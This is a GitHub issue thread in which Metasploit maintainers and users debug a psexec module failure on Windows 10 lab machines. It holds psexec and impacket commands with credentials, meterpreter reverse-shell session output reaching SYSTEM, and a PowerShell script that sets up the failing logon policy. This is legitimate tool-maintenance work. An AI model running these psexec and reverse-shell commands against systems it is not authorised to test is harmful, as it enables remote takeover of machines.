Open friedrico opened 3 years ago
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
This includes: the output of the debug command in your Metasploit console. The easier it is for us to replicate and debug an issue, the higher the chance of this issue being resolved.
cc @cdelafuente-r7 - I'm not sure if there's enough detail to replicate the original issue, but does anything pop out to you as being different maybe? 🤔
I just tested against Windows 10 version 20H2 and could not reproduce the issue:
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS <redacted_ip> yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass <redacted> no The password for the specified username
SMBUser smbtest no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <redacted_ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on <redacted_ip>:4444
[*] <redacted_ip>:445 - Connecting to the server...
[*] <redacted_ip>:445 - Authenticating to <redacted_ip>:445 as user 'smbtest'...
[!] <redacted_ip>:445 - No active DB -- Credential data will not be saved!
[*] <redacted_ip>:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] <redacted_ip>:445 - PowerShell found
[*] <redacted_ip>:445 - Selecting PowerShell target
[*] <redacted_ip>:445 - Powershell command length: 2463
[*] <redacted_ip>:445 - Executing the payload...
[*] <redacted_ip>:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Obtaining a service manager handle...
[*] <redacted_ip>:445 - Creating the service...
[+] <redacted_ip>:445 - Successfully created the service
[*] <redacted_ip>:445 - Starting the service...
[+] <redacted_ip>:445 - Service start timed out, OK if running a command or non-service executable...
[*] <redacted_ip>:445 - Removing the service...
[+] <redacted_ip>:445 - Successfully removed the service
[*] <redacted_ip>:445 - Closing service handle...
[*] Sending stage (175174 bytes) to <redacted_ip>
[*] Meterpreter session 1 opened (<redacted_ip>:4444 -> <redacted_ip>:50158) at 2021-06-08 18:36:12 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
@friedrico, that would be great if we could have more details to help us reproduce the issue. Also, a PCAP would be useful. Since SMBv3 with encryption is used by default, please disable encryption with this option to get meaningful packet capture:
set SMB::AlwaysEncrypt false
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Sorry, haven't had time.
I just repeated the actions - still the same problem. Even if I used set SMB::AlwaysEncrypt false.
sanitized
base64 -d <<< BASE64STR > my.pcap
Can I unclose the issue?
@friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?
meterpreter > sysinfo
Computer : WIN7
OS : Windows 10 (10.0 Build 16299).
Architecture : x64
System Language : en_US
Domain : ...
Logged On Users : 6
Meterpreter : x86/windows
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?
This is still affecting recent systems -- here's a Windows 10 target example with the output of systeminfo:
meterpreter > execute -if "systeminfo"
Process 6836 created.
Channel 4 created.
Host Name: irrelevant
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.19044 N/A Build 19044
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-10181-97955-AA169
Original Install Date: 5/3/2022, 11:35:25 PM
System Boot Time: 11/11/2022, 6:44:39 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
[02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,468 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,350 MB
Virtual Memory: In Use: 1,449 MB
Metasploit version:
msfconsole -qx 'version'
Framework: 6.0.27-dev-
Console : 6.0.27-dev-
Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.
@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error
If there's more details for how to create an env to reproduce this error that would be appreciated 💯
Edit: I added a user to the "Deny access to this computer from the network" GPO and got the STATUS_LOGON_TYPE_NOT_GRANTED error:
msf6 exploit(windows/smb/psexec) > run smb://admin_without_remote:p4$$w0rd@192.168.123.13
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|testing as user 'admin_without_remote'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
but impacket didn't work either, so I'm probably close to the right area - but still haven't fully replicated yet 🤔
python3 ~/Documents/code/impacket/examples/psexec.py 'admin_without_remote:p4$$w0rd@192.168.123.13'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_TYPE_NOT_GRANTED(A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.)
Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.
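The policy change adfoster-r7 describes above, written out as a script so the environment can be rebuilt on demand. This is an added example, not Metasploit project code and not something posted by anyone in this thread. It creates a local account, puts it in Administrators, and adds its SID to the SeDenyNetworkLogonRight user right ("Deny access to this computer from the network") through secedit, which is what turns the SMB session setup into STATUS_LOGON_TYPE_NOT_GRANTED. The account name and password are assumptions copied from the run above; the temp file names are assumptions too. Run it in an elevated PowerShell on the target VM.

```powershell
# Added example (not Metasploit code, not from the thread). Reproduces the
# "Deny access to this computer from the network" condition on a local admin.
# Assumptions: account name/password from the run above, temp file names.

$User = 'admin_without_remote'
$Pass = ConvertTo-SecureString 'p4$$w0rd' -AsPlainText -Force
$Cfg  = Join-Path $env:TEMP 'user_rights.inf'
$Db   = Join-Path $env:TEMP 'user_rights.sdb'

# 1. A local account that is a member of Administrators.
if (-not (Get-LocalUser -Name $User -ErrorAction SilentlyContinue)) {
    New-LocalUser -Name $User -Password $Pass -PasswordNeverExpires | Out-Null
}
if (-not (Get-LocalGroupMember -Group 'Administrators' -Member $User -ErrorAction SilentlyContinue)) {
    Add-LocalGroupMember -Group 'Administrators' -Member $User
}
$Sid = (Get-LocalUser -Name $User).SID.Value

# 2. Add the SID to SeDenyNetworkLogonRight: export the current user-rights
#    policy, edit the [Privilege Rights] section, import it back.
#    The .inf format is "SeDenyNetworkLogonRight = *SID1,*SID2".
secedit /export /cfg $Cfg /areas USER_RIGHTS | Out-Null
$Lines = Get-Content -Path $Cfg
$Existing = $Lines | Where-Object { $_ -match '^SeDenyNetworkLogonRight\s*=' }
if ($Existing) {
    # Right already assigned to someone: append our SID unless already present.
    $Lines = $Lines | ForEach-Object {
        if ($_ -match '^SeDenyNetworkLogonRight\s*=' -and $_ -notmatch [regex]::Escape($Sid)) {
            "$_,*$Sid"
        } else {
            $_
        }
    }
} else {
    # Right not assigned yet: insert it directly under the section header so it
    # does not land in the trailing [Version] section.
    $Idx = [Array]::IndexOf($Lines, '[Privilege Rights]')
    $Lines = @($Lines[0..$Idx]) + "SeDenyNetworkLogonRight = *$Sid" + @($Lines[($Idx + 1)..($Lines.Count - 1)])
}
Set-Content -Path $Cfg -Value $Lines -Encoding Unicode
secedit /configure /db $Db /cfg $Cfg /areas USER_RIGHTS | Out-Null

# 3. Confirm the right now lists the SID. Deny rights are checked at logon, so
#    new network (type 3) logons for this account should fail without a reboot,
#    while console logon for the same account is unaffected.
secedit /export /cfg $Cfg /areas USER_RIGHTS | Out-Null
Select-String -Path $Cfg -Pattern '^SeDenyNetworkLogonRight'

# To undo: delete "*$Sid" from that line in $Cfg and run the same
# 'secedit /configure' command again.
```

After this, the psexec module run shown above should end in Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED. Note the caveat already visible in the thread: this reproduces the error, but impacket's psexec.py fails on the same account too, so it does not by itself reproduce the divergence friedrico reports, where the Metasploit module fails and other tooling succeeds.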
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, this issue isn't Stale. @joswr1ght, can you still replicate this?
The steps for enabling the flags/policies to get an account to trigger this error locally where Metasploit fails and other tools succeed would definitely be appreciated 💯
I'm still thinking it's something to do with network logins versus interactive logins, but I haven't looked at this since poking at it last
Why does exploit/windows/smb/psexec react differently from impacket-psexec? Shouldn't they do the same thing?